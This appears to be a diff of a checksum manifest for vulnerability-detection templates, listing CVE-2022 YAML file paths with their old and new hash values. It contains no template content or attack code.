http/cves/2022/CVE-2022-0785.yaml:47eddef2296126f08953940173a7cd6c3611a807 -http/cves/2022/CVE-2022-0786.yaml:d4e04a3b67ca3d919cfd73f5ed272ecc01c0f2ce -http/cves/2022/CVE-2022-0787.yaml:b55da09d4370536807b494540dd2485cd7926d8b +http/cves/2022/CVE-2022-0786.yaml:e363dfd0c1b24a0e57068636616d93beab88103d +http/cves/2022/CVE-2022-0787.yaml:e54f4d8c3fece95a12ded4232445e3aeb6f8475b http/cves/2022/CVE-2022-0788.yaml:5d60f92d349f7fecefec325a40f08d6970a98a99 -http/cves/2022/CVE-2022-0814.yaml:a44122940bfbf44d2103db07dd1e9797055b0617 -http/cves/2022/CVE-2022-0817.yaml:b742b01b45059457e65b2f40d333d3392b8245ba -http/cves/2022/CVE-2022-0824.yaml:834df363f2d408a096b0e7c39a96f875659e99df -http/cves/2022/CVE-2022-0826.yaml:c968716c056d8bac29c828f6de28d91fe05c9131 -http/cves/2022/CVE-2022-0827.yaml:08336164d26872a6cc676046ef7a1e26af4d1d30 -http/cves/2022/CVE-2022-0846.yaml:f79dd734e1a26b052d0e36f9492518e49c90678c -http/cves/2022/CVE-2022-0864.yaml:5c7707d5caef3af0c8a26df70fa01c5bb9eace7e +http/cves/2022/CVE-2022-0814.yaml:34df968bf978c79cd8819e2a503f14a0f9dd272b +http/cves/2022/CVE-2022-0817.yaml:5c431e59ea20592d78af76411e6d3da46e6c757e +http/cves/2022/CVE-2022-0824.yaml:7efd9a9ae0b141acd98b15701ee248154df116c4 +http/cves/2022/CVE-2022-0826.yaml:299c0297ba9281c8b60894c9f1035988adea8661 +http/cves/2022/CVE-2022-0827.yaml:7f902409a5b30eec1b049634f2421620e368aee4 +http/cves/2022/CVE-2022-0846.yaml:9601c3fa97da17932accbde0ba1d9638fd548393 +http/cves/2022/CVE-2022-0864.yaml:2518bb9d221e4206b6027e6fe3fbc28c0c95039c http/cves/2022/CVE-2022-0867.yaml:6e863875d948eb2710e1bd9f80b30a8a4a84e1ce -http/cves/2022/CVE-2022-0869.yaml:eac3f6cb08a6fde39633b57380547f077d31f125 -http/cves/2022/CVE-2022-0870.yaml:50d1fffb2a551f946af8743ee205f95504659338 +http/cves/2022/CVE-2022-0869.yaml:5f22f9c210878f98fe7d51b3f4d31220448a2b53 +http/cves/2022/CVE-2022-0870.yaml:3370c35e350ac61b23fcbb68a8ab0ae49560ecd6 http/cves/2022/CVE-2022-0885.yaml:841e640a6d3e053d8347a3f6083e082f8add157b -http/cves/2022/CVE-2022-0899.yaml:278013a61ae11ce51e474ecf517491761b5d61e0 -http/cves/2022/CVE-2022-0928.yaml:c0068dcd8a694a946e5b82cc9020c5ad54c8d964 +http/cves/2022/CVE-2022-0899.yaml:ede33b54f00c749d949e67929e400c4dc6938863 +http/cves/2022/CVE-2022-0928.yaml:d80673476c59832b3f7e3787d291ad7efef2ca46 http/cves/2022/CVE-2022-0948.yaml:d81bdba80c595c26ed421d5ac4697749a26423d5 -http/cves/2022/CVE-2022-0949.yaml:d99e1dfae652d1ec70bf341d27363455003ab189 +http/cves/2022/CVE-2022-0949.yaml:dccd7a5fbf9b6f32b37b7108aa597e028f54b4be http/cves/2022/CVE-2022-0952.yaml:7e2d47b7c6fed59342471c942cb0707a354d59ed -http/cves/2022/CVE-2022-0954.yaml:fa61e9ea98d6d816139735db7628c37b53189534 -http/cves/2022/CVE-2022-0963.yaml:c54aa6de98b36acd4b0979ef84e55bbbb4603a53 -http/cves/2022/CVE-2022-0968.yaml:77728489e530e663c33f4201ad9fcfe3c4556d3b -http/cves/2022/CVE-2022-1007.yaml:36edf0bb86b964fca0a5c55adf7106e73043bfcd -http/cves/2022/CVE-2022-1013.yaml:dbe1a0af8c63914f65dcd643751b33214a16dd8c +http/cves/2022/CVE-2022-0954.yaml:85c28e58af00cf2eca329c7151f1ea4426ab711b +http/cves/2022/CVE-2022-0963.yaml:e9b05e33b4b2b10a429c4c0d819bf02bcb9a9b90 +http/cves/2022/CVE-2022-0968.yaml:162d0893c4eeeec34a60489625f19632ed43cb7e +http/cves/2022/CVE-2022-1007.yaml:3fd1301dc8f88363820d4a11e1f127d00118c611 +http/cves/2022/CVE-2022-1013.yaml:0b812916478c24470e327ecc540ccf224458d4fb http/cves/2022/CVE-2022-1020.yaml:59af3f4fbbadc5897088c95b708c639991dc15e6 -http/cves/2022/CVE-2022-1040.yaml:a9df5761dfd259dbb6047478d30e3940d03a7f70 -http/cves/2022/CVE-2022-1054.yaml:c54d411377a17bd5d60263093e2767ee22534673 -http/cves/2022/CVE-2022-1057.yaml:5f46c2dc2bc251298fd7e75c7cd2ba71c2229555 -http/cves/2022/CVE-2022-1058.yaml:63bbd81636d662531c177318f538d2c153aa6adb -http/cves/2022/CVE-2022-1119.yaml:1d0f2bd435628848503dabee8f2eabdf1a86067d -http/cves/2022/CVE-2022-1162.yaml:d8f2146cb3c6f35da4df271ce65a524377507359 +http/cves/2022/CVE-2022-1040.yaml:0338f322d06277a2483b734e7031b90987eca963 +http/cves/2022/CVE-2022-1054.yaml:328b9fc4c45be9ac1cdd955ea0acd35dc90cbd10 +http/cves/2022/CVE-2022-1057.yaml:e7848ebf7ab5cd6c7f4ac9a845a22036bcab95ff +http/cves/2022/CVE-2022-1058.yaml:470bd6029ed9652c473489eaef0d4cf53d4ca515 +http/cves/2022/CVE-2022-1119.yaml:34c32126dab5750c175f12ff4584910304e832a9 +http/cves/2022/CVE-2022-1162.yaml:13fbccfd9e0e667925edf8fa16f30d3db2e3a50c http/cves/2022/CVE-2022-1168.yaml:93e0ac42cd3ee8391d615a78f9eac80ae749aa8f -http/cves/2022/CVE-2022-1170.yaml:656973b0f6a3a05600c594153da9d4827b55d0ae -http/cves/2022/CVE-2022-1221.yaml:4b2e536b8cd12c2e3967a186d960d439e1c5c1d5 -http/cves/2022/CVE-2022-1329.yaml:40402840e458955c5ba08aaf4e554cec1191b725 -http/cves/2022/CVE-2022-1386.yaml:f3455ff74125eade27ea2a398eb455e4670bd6ab -http/cves/2022/CVE-2022-1388.yaml:9583c72090e4d3a4b6aab41092bc252b431674e2 +http/cves/2022/CVE-2022-1170.yaml:4d896ab7996ee645f8f6d119dcc055dfa7998f6e +http/cves/2022/CVE-2022-1221.yaml:d7a6fa47284e7090b839907667c9296ba9e0b086 +http/cves/2022/CVE-2022-1329.yaml:b581942b2d9b46c5638853c3300a1d05fb9f7bdc +http/cves/2022/CVE-2022-1386.yaml:2f7a2b089ae2690a801e91ac4dd7b8710fa5e649 +http/cves/2022/CVE-2022-1388.yaml:c30f8e0fdcd48a2feee836e33401c76ea2d859c8 http/cves/2022/CVE-2022-1390.yaml:cdda5e7620a740024ec05c775b94861e6885853a -http/cves/2022/CVE-2022-1391.yaml:89490c3f0354d4aa7ba547c029bfe867ea975b4e -http/cves/2022/CVE-2022-1392.yaml:c3e545e3a05ffcc1d736639e307a7b7d453f1026 +http/cves/2022/CVE-2022-1391.yaml:cce47bb47c7e144b8ee9ab3a94b77bcfbc551c5d +http/cves/2022/CVE-2022-1392.yaml:3e6660c3bacc2eb9f7f6b8025e0415ab25f5815b http/cves/2022/CVE-2022-1398.yaml:8168fc6638082f59e200f1101d369a35f0d123ed -http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 -http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 -http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c -http/cves/2022/CVE-2022-1580.yaml:0e94c20783866096e69931ba80caccbf03b74fdb +http/cves/2022/CVE-2022-1439.yaml:66bc3d1bb1b6f206de5661adc27251d2e699c521 +http/cves/2022/CVE-2022-1442.yaml:5721248036a2fff83a52bed27124718e08d95d69 +http/cves/2022/CVE-2022-1574.yaml:0d5ac3e5ddcac8da6a4cfd8f8e018d7951fd31fd +http/cves/2022/CVE-2022-1580.yaml:f1574e38e79dadd9b5e08bfec6dd4a4a0783d66d http/cves/2022/CVE-2022-1595.yaml:e62d387c391349d9a30991379aff1b17d5af912d -http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c -http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e +http/cves/2022/CVE-2022-1597.yaml:90c6391409dddfaf4f3a7643d597e772deb4841b +http/cves/2022/CVE-2022-1598.yaml:0bf3a544454936cf7db585b6002c4eaa84fa72cc http/cves/2022/CVE-2022-1609.yaml:3997b6a9aec82ff2e552d1b8f53e34f0d61de38d -http/cves/2022/CVE-2022-1713.yaml:c5fbebd8e2a8cda7cfe55dbc1c9e5f22425b8dd3 +http/cves/2022/CVE-2022-1713.yaml:9828ac75de83bc7801f83da9ec2d29eb92e740bf http/cves/2022/CVE-2022-1724.yaml:51995547bb5168cd0645a5adf37a850a5a1e6b87 -http/cves/2022/CVE-2022-1756.yaml:ca0099ae7fbcc4949168b4b66c4b4074b76ee6a1 -http/cves/2022/CVE-2022-1768.yaml:aa9ca20c0960213c17f9480a23b85b27b158a2b2 -http/cves/2022/CVE-2022-1815.yaml:296a8cbfefffefd5689f6fd7d4290d909aeb44c8 +http/cves/2022/CVE-2022-1756.yaml:b92f855ff00dc428a7c2a1605ce49eb0c71d76b1 +http/cves/2022/CVE-2022-1768.yaml:69b204d4963e3d0ebf9ec6196014834b9292034e +http/cves/2022/CVE-2022-1815.yaml:20befc0f7d15db67af95a179b70085b63ece11b9 http/cves/2022/CVE-2022-1883.yaml:9ea27969a99bb6fcb353913f3c079f33f01a3e3c -http/cves/2022/CVE-2022-1903.yaml:208a095a1fad78459a646c1dd69fd85f48f946c3 +http/cves/2022/CVE-2022-1903.yaml:811c45ec923ddd51a1c5c1405ad8c120ae19de74 http/cves/2022/CVE-2022-1904.yaml:8364554cac977f888ab267875d02bbf1f2cb924b http/cves/2022/CVE-2022-1906.yaml:32a30dcf31d119545c4e7d34db4609089bf3fab5 http/cves/2022/CVE-2022-1910.yaml:285281f4e315d751f66c43077868a0c660fa544c http/cves/2022/CVE-2022-1916.yaml:c49dfcef4c446dc595f69fc553a3ac2a70461b5c http/cves/2022/CVE-2022-1933.yaml:698dc72c8292ca8e6b7d5b7c52c9a8ea39407718 -http/cves/2022/CVE-2022-1937.yaml:7e5f553c9ebe4b5a0945822af6c31a8efb8def26 -http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d +http/cves/2022/CVE-2022-1937.yaml:e941acf92cd1c96a4470945fa811aa93626bc5c5 +http/cves/2022/CVE-2022-1946.yaml:0b56e0e84129d6dd88a849695cb99a8c9d3dce6c http/cves/2022/CVE-2022-1952.yaml:94de725f4880107f8c58454b17b55f6e934d94bf -http/cves/2022/CVE-2022-2034.yaml:e6a1b542f667903a5f16aca40d8940497e933818 -http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944 -http/cves/2022/CVE-2022-21500.yaml:09c47788ed23dac1444cc160ed94c32c30d492d9 -http/cves/2022/CVE-2022-21587.yaml:893747ed6b1a4fbf2e8f94908b8cb9a69ffb67bb -http/cves/2022/CVE-2022-21661.yaml:b025b959b87670e417a2c431aafe049fb6f95aa0 -http/cves/2022/CVE-2022-21705.yaml:78cae0512c86305d0021edf3c85db600f6529501 -http/cves/2022/CVE-2022-2174.yaml:215ce90c7c79d105a897cef06b5b751798714325 -http/cves/2022/CVE-2022-2185.yaml:b302535b57512d08ff50cc98f8e29ceee474bb67 -http/cves/2022/CVE-2022-2187.yaml:d49448aeb3a60d519ec0f882411029d93449cb09 -http/cves/2022/CVE-2022-2219.yaml:f7b399fbf13b315ba3572bb95e8a517605780ccc -http/cves/2022/CVE-2022-22242.yaml:b436f4fa38b41e393a70c271ce5808da14ca1200 -http/cves/2022/CVE-2022-22536.yaml:2a50caf1a9f68f3369e917f3bb7f1d8e6b65b6d8 -http/cves/2022/CVE-2022-22733.yaml:89003df5b937b3ab5ca97bea819a242ba1f8fbee +http/cves/2022/CVE-2022-2034.yaml:158eeebac9ac232cca985e482ea43741e467061f +http/cves/2022/CVE-2022-21371.yaml:cba0fb96eb978b8e72e60c7b172d95b0ad028565 +http/cves/2022/CVE-2022-21500.yaml:1eaeb9251d2838c0516e3554b86eea2c8d97827a +http/cves/2022/CVE-2022-21587.yaml:1ae918632584ad05458acd7bb0cf4064d17bfd24 +http/cves/2022/CVE-2022-21661.yaml:6420ee0176abaae835167ead34b90a9ba5d0614a +http/cves/2022/CVE-2022-21705.yaml:da4d9dd338c3b59a2bca4c85f0887680f45ea403 +http/cves/2022/CVE-2022-2174.yaml:435becff31d43249ac20ae177d286a7207b6b592 +http/cves/2022/CVE-2022-2185.yaml:fc1fb7bfd5f41128894b8c5222aca097ca57f2c3 +http/cves/2022/CVE-2022-2187.yaml:5cf52634d6a55b5868342dc171251d07829f6102 +http/cves/2022/CVE-2022-2219.yaml:717abfcdaaab2349c8c228d9bb586644f9c4c5da +http/cves/2022/CVE-2022-22242.yaml:dc86b437fc522cb1896da9a3992eeebf0e3c1a7b +http/cves/2022/CVE-2022-22536.yaml:ff5454dbd35d669ea1f06eb22b1e4087b0ef3ffa +http/cves/2022/CVE-2022-22733.yaml:a45d0c846702da4eef78024bf51ae5f683f550d6 http/cves/2022/CVE-2022-22897.yaml:da96a058c0b51cabc86662041dbebd679ebcaaed -http/cves/2022/CVE-2022-2290.yaml:fa4cd065d732bf98911b59c6654a606b08743383 -http/cves/2022/CVE-2022-22947.yaml:eb9d29cf2146e3457d9e38b5c4f1bdd37b49f9dc -http/cves/2022/CVE-2022-22954.yaml:7fc1b436de35daea85136a6ad03332cc25cf27e4 +http/cves/2022/CVE-2022-2290.yaml:31697d0b58f03a100b474839f9325f5c7e8fd442 +http/cves/2022/CVE-2022-22947.yaml:ea5b2faf78de991dc594ef3c85a68acc94ce65a1 +http/cves/2022/CVE-2022-22954.yaml:ed2854ff1aed55659a72f03a8e2e2aafa29cc8dd http/cves/2022/CVE-2022-22963.yaml:ab06c00110e4a9102dbf94fea920b608eea04c14 http/cves/2022/CVE-2022-22965.yaml:ef5b9d4d0ee4294bb2924a8191e4b9f50844ab5f -http/cves/2022/CVE-2022-22972.yaml:20ae7ffa9fc7e4a84f4244d0f60c34e1ba888104 -http/cves/2022/CVE-2022-23102.yaml:2c0601f1c235f0ace6e9cce546c8e1eac687dee0 -http/cves/2022/CVE-2022-23131.yaml:648768e33c0a8a843f54452a00e671eca3ee5f55 -http/cves/2022/CVE-2022-23134.yaml:dd7f8ab346a265af3e5fc1eebfdfeb3f87b002ba +http/cves/2022/CVE-2022-22972.yaml:3549dfd676303f89c1c637eed8e499ef000da382 +http/cves/2022/CVE-2022-23102.yaml:262c2d998812d9123b874b19bc7f4daf59403af7 +http/cves/2022/CVE-2022-23131.yaml:d14c8e9f7f7051d7437864129007b36420dbcf4f +http/cves/2022/CVE-2022-23134.yaml:433adf9da6c77b61aeb17244802a814998c1f5a4 http/cves/2022/CVE-2022-2314.yaml:e36aa03da886dca014a29f2bafa939215c4fa5c7 -http/cves/2022/CVE-2022-23178.yaml:f8a6eabd1cfb10a524974bcbe7dc56161a20b314 -http/cves/2022/CVE-2022-23347.yaml:d5c0b7111ebb6fcb47d32369acbc46967d10491e -http/cves/2022/CVE-2022-23348.yaml:181e648a568a0388da1530b3241cce35a4f8002b -http/cves/2022/CVE-2022-23544.yaml:962b0c496544c6aeabfc65ce3b56be323cc8aa5e +http/cves/2022/CVE-2022-23178.yaml:289a85491b31dd72bd0e7aec156a578c89eb468b +http/cves/2022/CVE-2022-23347.yaml:5d8aa203cf3ad184973792dbc11be56d18fb0844 +http/cves/2022/CVE-2022-23348.yaml:81374e83f9a095cada7b62cb4707ecb01bb99cd7 +http/cves/2022/CVE-2022-23544.yaml:21dcf90384d3f573d8d71b6a78bc8faf3c7bafbf http/cves/2022/CVE-2022-2373.yaml:b0260161242967d78f92a87a0dc6da50303b81aa -http/cves/2022/CVE-2022-2376.yaml:7735b152f86fece31cf5f3c5145d1e7c3b264039 -http/cves/2022/CVE-2022-23779.yaml:b49a66f89179bb9e19f230d565801b334330ad8d +http/cves/2022/CVE-2022-2376.yaml:d50a273a15444bcb59c29464d8b60de82c59de44 +http/cves/2022/CVE-2022-23779.yaml:5e1ff9391b304b6ba76d406e69e8b62932cfe8b7 http/cves/2022/CVE-2022-2379.yaml:446f704bcd090adc8f7be858688562b10b71a83c -http/cves/2022/CVE-2022-23808.yaml:439b0ae666b3ac329a569261e12bcd1a97c57d93 -http/cves/2022/CVE-2022-2383.yaml:b9b2793dc181258b1cd4ca5fb29158445c7261ee -http/cves/2022/CVE-2022-23854.yaml:dbe44dea5ff70724b543e6860443b017b650307d +http/cves/2022/CVE-2022-23808.yaml:25d8746bfe512b3a2ba5eccc2ca4e6e6793083de +http/cves/2022/CVE-2022-2383.yaml:e2c2b2867b8246a46e9153661bb27e8e3b87ad33 +http/cves/2022/CVE-2022-23854.yaml:84dca45a9ef9138d5c8dc9dc39e342a27bdefcc3 http/cves/2022/CVE-2022-23881.yaml:af0d94cea1d7840f3800ea02e4e602cf960d2530 -http/cves/2022/CVE-2022-23898.yaml:f8c8e4e7f9865bcec5cf8dac00c5c7bab1866bf2 +http/cves/2022/CVE-2022-23898.yaml:6416b11155b41434469a0bca1a6464f267f1b702 http/cves/2022/CVE-2022-23944.yaml:320d92bd111caf4003aeac9a1ef9f65cee4f1f5d -http/cves/2022/CVE-2022-24112.yaml:4034ea358c38ea2642cfbafd6bc5f9949c0e9a74 -http/cves/2022/CVE-2022-24124.yaml:85c1904f8c2d576f24afbcbbaaa093f994074cb8 +http/cves/2022/CVE-2022-24112.yaml:141c206e2ae621e514be5cc620a8900d4cf40dbc +http/cves/2022/CVE-2022-24124.yaml:45e38f27049048c227a6272dfc1534448dae0eb9 http/cves/2022/CVE-2022-24129.yaml:e9b5d1244a8f2dea948ea4cfb46b3756f0292aea -http/cves/2022/CVE-2022-2414.yaml:68d31eaf41572c264f08d1f4bc5041cdb6543a36 -http/cves/2022/CVE-2022-24181.yaml:776437592260aa5a0b327bd750557745bb2fa704 +http/cves/2022/CVE-2022-2414.yaml:4b25266f43c63064cf6f9989f8a480070c3abd48 +http/cves/2022/CVE-2022-24181.yaml:ea45bf37f04d1f527756df639d348a511cde13a2 http/cves/2022/CVE-2022-24223.yaml:e43e51025ee47293e25236bcf774b68055693f09 -http/cves/2022/CVE-2022-24260.yaml:a88a26a61769b348e5092d29e489b6a896da95a7 -http/cves/2022/CVE-2022-24264.yaml:84820e62689423e214677576a75193b1434f76b5 +http/cves/2022/CVE-2022-24260.yaml:d5b5ab94d9ff01bb8c9ebe9b6e4f41e25e26343e +http/cves/2022/CVE-2022-24264.yaml:b01acf17b8d49b9cfc579127fb05cf71ab4904f0 http/cves/2022/CVE-2022-24265.yaml:9ae194e777ddc72784b2b00c2e213855c49dc51f -http/cves/2022/CVE-2022-24266.yaml:467b79b6595a05d7d7450c7abcbe5f2ef716a77a -http/cves/2022/CVE-2022-24288.yaml:6285080906d3064a87a3a20a55ef68191c41a02a -http/cves/2022/CVE-2022-24384.yaml:78d4618915a3b09e8ff20dcefffb87927ee0b21c +http/cves/2022/CVE-2022-24266.yaml:261f18493e5f8efa1151ecf9d493caf303c7f64c +http/cves/2022/CVE-2022-24288.yaml:9735c3cc288b8417955e7ca7866f4562bad72784 +http/cves/2022/CVE-2022-24384.yaml:1c1f1122ab5ca858bc6f17d70c16072eb03bc056 http/cves/2022/CVE-2022-2462.yaml:b616122e964f0556354fda2eef23158969018171 -http/cves/2022/CVE-2022-24627.yaml:7ca53d2e431bc780ea73086341d93cff02b37597 +http/cves/2022/CVE-2022-24627.yaml:048be7ac0aea604fcb50f70163f600cde1e65a0c http/cves/2022/CVE-2022-2467.yaml:8c177232bacaa6d592aac6d3c5eafd606aa45d4f -http/cves/2022/CVE-2022-24681.yaml:6f454c890cfe98c4595da8c2cbea38e36dad81c0 -http/cves/2022/CVE-2022-24716.yaml:c36dc70cada0ebc962691b8713bb6033a2443ee1 +http/cves/2022/CVE-2022-24681.yaml:ec28876460bcc67181e5304e212654f279f01e20 +http/cves/2022/CVE-2022-24716.yaml:b56900c67b20f16f0084d9f5f61d8ae5acadfc92 http/cves/2022/CVE-2022-24816.yaml:eb935681a105de90b8b7db6ab7e8ae2f9d71d166 -http/cves/2022/CVE-2022-24856.yaml:a4dea37f0fc3ebf1debfbcc51d55ae28d89c247c -http/cves/2022/CVE-2022-2486.yaml:f2265ddb3492e43487b69c82c7454d7345b0d864 -http/cves/2022/CVE-2022-2487.yaml:978d76ddd03fc23768561b4878ba5c74d1e3464f -http/cves/2022/CVE-2022-2488.yaml:502afafdafbeaa24075cdfcf71a57d8a0b663b9e -http/cves/2022/CVE-2022-24899.yaml:84e48495f7a332da6ab7e47e2fcf1d35ace96f96 -http/cves/2022/CVE-2022-24900.yaml:c286065b94b97d387aecee1333b114c37eb65493 +http/cves/2022/CVE-2022-24856.yaml:50d0ccb11f8cecdad6a06cc46dc31b65a4d89a69 +http/cves/2022/CVE-2022-2486.yaml:b19909160ca1366076d9ee3637844ad6f6f9a28b +http/cves/2022/CVE-2022-2487.yaml:3d8d73920ea053336c64b5c1e92e64aa4b7dfc2a +http/cves/2022/CVE-2022-2488.yaml:bf4233c5af2c5f352fb2dde2369cbafd9ee5ecf0 +http/cves/2022/CVE-2022-24899.yaml:dcca0db248fde708cffbeeb936b0e93d50da8562 +http/cves/2022/CVE-2022-24900.yaml:d64c61755b5634ec98eb28857ac9aeae814e8912 http/cves/2022/CVE-2022-24990.yaml:f26110b1f9281c994fb673f8d75b9d5c5defb34c -http/cves/2022/CVE-2022-25082.yaml:287802bf1fc02c531819bb5be077a2e8401c1f8c +http/cves/2022/CVE-2022-25082.yaml:14cae51e03ce7ae34c51300ddd8a60c23c726e49 http/cves/2022/CVE-2022-25125.yaml:179749a2fbb69006ca6236e34e9fadce2ee33b4e -http/cves/2022/CVE-2022-25148.yaml:6be4dde14ecfbf45d0c8b4abdf58c9231a3acd53 -http/cves/2022/CVE-2022-25149.yaml:084797f6a16c37df2ca7a86f82807d1d37aefd37 -http/cves/2022/CVE-2022-25216.yaml:4d207e8665d17ed3df3dbd984804bbf8b74bd720 -http/cves/2022/CVE-2022-25323.yaml:6f1738287bc826693c00250344669841bb7e5762 -http/cves/2022/CVE-2022-2535.yaml:34528dba7226bad5ac11934a0893549f9034a83a -http/cves/2022/CVE-2022-25356.yaml:215893d96e5aaa3bd94ec1d627b40c116d8da26f +http/cves/2022/CVE-2022-25148.yaml:3ed87df983b2fbd57c2935a246d269a9d0bcbde3 +http/cves/2022/CVE-2022-25149.yaml:196a79ea9406fa57705882fc7b8d37a90a38cbe6 +http/cves/2022/CVE-2022-25216.yaml:d3091c0e41280e4a94c204cad022812ca5281a49 +http/cves/2022/CVE-2022-25323.yaml:fdefaa2bf40f6809bcbb3473ec5937af18689a16 +http/cves/2022/CVE-2022-2535.yaml:4cff7b3c04f783023a19ba8bf25a112948e7f45f +http/cves/2022/CVE-2022-25356.yaml:72059568da5561819d8b616965b02943779953a0 http/cves/2022/CVE-2022-25369.yaml:0ee619ca8d2be9827b2d23e719a8eb04a1d560f7 http/cves/2022/CVE-2022-2544.yaml:c85cd47921d9f7756c8d69d7b5cca07fac418257 -http/cves/2022/CVE-2022-2546.yaml:111eb19fb05e02dedbe9dfa8ac5c3111bb7e9632 -http/cves/2022/CVE-2022-25481.yaml:668c890131118e3551f9f7092ce4c99c9703f848 +http/cves/2022/CVE-2022-2546.yaml:78178a538c57e5a348d57de024f0e61feb524327 +http/cves/2022/CVE-2022-25481.yaml:2c3cbfd251a6b95c798a4c7811057ac3bac5fd9e http/cves/2022/CVE-2022-25485.yaml:3674f5ab31f186d55843c550fc1e3409ab9dc652 http/cves/2022/CVE-2022-25486.yaml:de285c467f5f02814968f009f996a7eaf817d3e4 -http/cves/2022/CVE-2022-25487.yaml:5d7eae5a1df0f4c7a9951eedbfbd9eac49bda7f6 +http/cves/2022/CVE-2022-25487.yaml:954ea465dd9f1605a0a6b047bc3853b763ab5597 http/cves/2022/CVE-2022-25488.yaml:a4ae57601c63399470b7d427a5f33f504cac8c1d -http/cves/2022/CVE-2022-25489.yaml:2d1a90be1e6bd0d2f9544b737b2b586c6d2f845c -http/cves/2022/CVE-2022-25497.yaml:c19182294ccffa0cdbb718292f70e8abd19d0dce -http/cves/2022/CVE-2022-2551.yaml:63c139c88c40ab79dcec592aec8692e8aa8e2fa8 -http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665 -http/cves/2022/CVE-2022-2599.yaml:7d3af6b789612ad3f4a6d6a07032c81ba17d76c9 -http/cves/2022/CVE-2022-26134.yaml:f7fb4033dd74f4d26db136e83fd2e72f6f4e7d92 -http/cves/2022/CVE-2022-26138.yaml:074e37d25f27a654b5eaf1139d189e44dd11b140 -http/cves/2022/CVE-2022-26148.yaml:e227570ca3d8e725929fb01fd04920879dc64a17 +http/cves/2022/CVE-2022-25489.yaml:87a66489d10368e26f769965bd4df28a80ad6939 +http/cves/2022/CVE-2022-25497.yaml:f0755ff3a2ec64e942cc3b2bb282e403bb337907 +http/cves/2022/CVE-2022-2551.yaml:536e0d2d4b946c2b50e3917c41efee5bbe03b4a1 +http/cves/2022/CVE-2022-25568.yaml:38d004cb5dfde8a3046df846358b01a71308936c +http/cves/2022/CVE-2022-2599.yaml:322084c1b97631f697221f29de4c652ce5d64301 +http/cves/2022/CVE-2022-26134.yaml:3a1a18134821b192d8aa713beb653573e2e2ab6d +http/cves/2022/CVE-2022-26138.yaml:243f30f2604d19a4f3c32c7b3ded8fac054f4ce8 +http/cves/2022/CVE-2022-26148.yaml:ba99bddad4bf94ae3bc65b56e5e94967e454526e http/cves/2022/CVE-2022-26159.yaml:2dde1b272c1dfeac01a264357157ec36a2908098 -http/cves/2022/CVE-2022-26233.yaml:c3c2b5ae6757ccea98f43bbad5972b476676580f +http/cves/2022/CVE-2022-26233.yaml:15f532c29bc7b1e1a97cfa4f05be7d653888c971 http/cves/2022/CVE-2022-26263.yaml:73a4edfc93c16f82b8ecaa8ccc1be52af28e86e1 -http/cves/2022/CVE-2022-2627.yaml:e98e136be4ea5c21c10cd325664f6fea87a260fe +http/cves/2022/CVE-2022-2627.yaml:a039d41b629892cb2b980285c545fdf6c8208f18 http/cves/2022/CVE-2022-2633.yaml:f5e4f97d83de093349047dbfef8f6fb8b6fcbaf3 -http/cves/2022/CVE-2022-26352.yaml:70d2e0089fe4cc87625b73a85f8e3616e0b8474f -http/cves/2022/CVE-2022-26564.yaml:283fe7d1f0f4d59e22c9e4b5d44e88d630fd0e9f -http/cves/2022/CVE-2022-26833.yaml:5c2c3477551fa36fe483b257d4c63706d362bbd9 -http/cves/2022/CVE-2022-26960.yaml:d95b3a57326cb7c8653e4232d2986836523352f4 -http/cves/2022/CVE-2022-2733.yaml:fcb0d225ecdb62dc0deffc3e744f5bcc7c39a8cb -http/cves/2022/CVE-2022-2756.yaml:d6bc3056cc0ffcd43c7e433944738be16aeb8e59 -http/cves/2022/CVE-2022-27593.yaml:549caad5236eb5206c2328d3a048f65254fe59aa +http/cves/2022/CVE-2022-26352.yaml:2f199bd711b7f940c8263e3f52d2094eb8447e1f +http/cves/2022/CVE-2022-26564.yaml:14cdcc0b5dfbefcf7719c793d61ff2e9239c0b2b +http/cves/2022/CVE-2022-26833.yaml:0a9af88561e63e7f6523dbbad606347e514718a9 +http/cves/2022/CVE-2022-26960.yaml:e0b8800ab72cd972218e1c6cd1da09f81e595df5 +http/cves/2022/CVE-2022-2733.yaml:d16edbb8ddef98b742c3e7d0a687264f869591e9 +http/cves/2022/CVE-2022-2756.yaml:da9ed378c7da8ad196e3012da1c951ae76b21c87 +http/cves/2022/CVE-2022-27593.yaml:2354a4092a7704879d4ac778d001880d8c081d33 http/cves/2022/CVE-2022-27849.yaml:97aa8073fe3a8568903eb3a71c29bd8d85b791eb -http/cves/2022/CVE-2022-27926.yaml:42dcf780cd1c1b01fa484074744887a2545e5c30 +http/cves/2022/CVE-2022-27926.yaml:da7ae007929c2fb6856021e4bf4340e8af1d7a89 http/cves/2022/CVE-2022-27927.yaml:633fdddad64db028886739bc32f962098d0ec796 http/cves/2022/CVE-2022-27984.yaml:46e0d68cbbfb63e9808acf7d5f85ba8012a2a2be http/cves/2022/CVE-2022-27985.yaml:7de01fef2fe8a799a34cbfa788042f1cbc888287 http/cves/2022/CVE-2022-28022.yaml:d9e2638306589873983b03d584708ab315752bd1 -http/cves/2022/CVE-2022-28023.yaml:03acdf570eb364962ab993c58b24d0b0aec386fb -http/cves/2022/CVE-2022-28032.yaml:db1ac89591d234ff6a673f34bbb7a84a8222cee8 -http/cves/2022/CVE-2022-28079.yaml:4b6c5a5fa0d4d4aaaef403ebc4a0aa4f500e3276 -http/cves/2022/CVE-2022-28080.yaml:c5aee5ae7a15efbbae10483c9b9c1de4c35ffa49 -http/cves/2022/CVE-2022-28117.yaml:3620eff699f223eff703f485d57bbefd0e1df934 -http/cves/2022/CVE-2022-28219.yaml:3a6a9801edb0334add1e51efa06cbe6c8bdb07b7 +http/cves/2022/CVE-2022-28023.yaml:4979f35397633f09f8b74e1ff16957ef31c2dc83 +http/cves/2022/CVE-2022-28032.yaml:7b2fca1b361b1d628558315b12f974b9bd10a422 +http/cves/2022/CVE-2022-28079.yaml:2e45d03d5e4ecc0776b8cdd2c78e6930b9025734 +http/cves/2022/CVE-2022-28080.yaml:76bfcd361fc9f5c5df2142c84b04f711c74cb4e9 